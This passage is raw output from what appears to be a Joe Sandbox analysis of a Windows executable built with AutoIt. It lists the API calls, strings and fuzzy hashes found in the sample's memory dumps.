                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F49A2B
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EFBC07
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _wcscat.LIBCMT ref: 00F33593
                                                    Similarity
                                                    • API ID: FullNamePath_memmove_wcscat
                                                    • String ID: h
                                                    APIs
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F49923
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F499A6
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    • Opcode ID: 5b9e65367f5480656cbae4740f5f0dc3cf71b42b5332eb3cd667f0d73e57d796
                                                    • Instruction ID: a01707c5468cec72e12eb4e19cf8af8eeb744e97bcad0b122a85f0a254cebe3b
                                                    • Opcode Fuzzy Hash: 5b9e65367f5480656cbae4740f5f0dc3cf71b42b5332eb3cd667f0d73e57d796
                                                    • Instruction Fuzzy Hash: CE01DBB2F45119BBDB14EBA4CE52EFF77ACAF11340F140019BC45632C1DA588E08B672
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 3a260f01e0112630d28136f47bed7ea0bc3eb7771e3497c63a8d55be8bb8ab57
                                                    • Instruction ID: fca472333bd6095c2bb931b67889304580e785e67ea446c3075ab7b25d325f75
                                                    • Opcode Fuzzy Hash: 3a260f01e0112630d28136f47bed7ea0bc3eb7771e3497c63a8d55be8bb8ab57
                                                    • Instruction Fuzzy Hash: 44E0617250022C17D720A659AC49FEBFBECDF45771F000017FD04D3051E960E94587D0
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F488A0
                                                      • Part of subcall function 00F13588: _doexit.LIBCMT ref: 00F13592
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: 1045b30042b6057c563d38529c060574eaf099a5bc1489e716475deffea91cda
                                                    • Instruction ID: 7196cc938b45f162041d446108fe9a2c53e599d36f502976bbe9a585bf27ade9
                                                    • Opcode Fuzzy Hash: 1045b30042b6057c563d38529c060574eaf099a5bc1489e716475deffea91cda
                                                    • Instruction Fuzzy Hash: CFD02B7138531832C25032A46D0BFDA7F488F09B61F000026FF08650C38DDAD5C0B2D6
                                                    APIs
                                                      • Part of subcall function 00F2B544: _memset.LIBCMT ref: 00F2B551
                                                      • Part of subcall function 00F10B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F2B520,?,?,?,00EF100A), ref: 00F10B79
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00EF100A), ref: 00F2B524
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EF100A), ref: 00F2B533
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F2B52E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: 9a77750c210f7d8076cc843d4a3ce048e1eeb59b7f8790a6677c9d93a81d3328
                                                    • Instruction ID: 0426bb50b4811762cb17ebf1b30d1f41a75a9320b67f23fe2dcecca718f1a2a4
                                                    • Opcode Fuzzy Hash: 9a77750c210f7d8076cc843d4a3ce048e1eeb59b7f8790a6677c9d93a81d3328
                                                    • Instruction Fuzzy Hash: 5EE06D702007258BD760AF25E8067527BE0AF44304F04891EE846C6341DFB8D548EB91
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00F30091
                                                      • Part of subcall function 00F6C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00F3027A,?), ref: 00F6C6E7
                                                      • Part of subcall function 00F6C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F6C6F9
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F30289
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: 0530a0bb4ecd4ef49084457c6eb201f5e7c591e81c170347ed806fc7d00463a7
                                                    • Instruction ID: 281b167db28d7b95a594f651ec41aa830f42bb1a3c2241ea91fd924094b60edd
                                                    • Opcode Fuzzy Hash: 0530a0bb4ecd4ef49084457c6eb201f5e7c591e81c170347ed806fc7d00463a7
                                                    • Instruction Fuzzy Hash: 54F0C0B1805109DFCB59DB54C9A87FD7BB8AB48314F541096E146B2160CF755F44EF21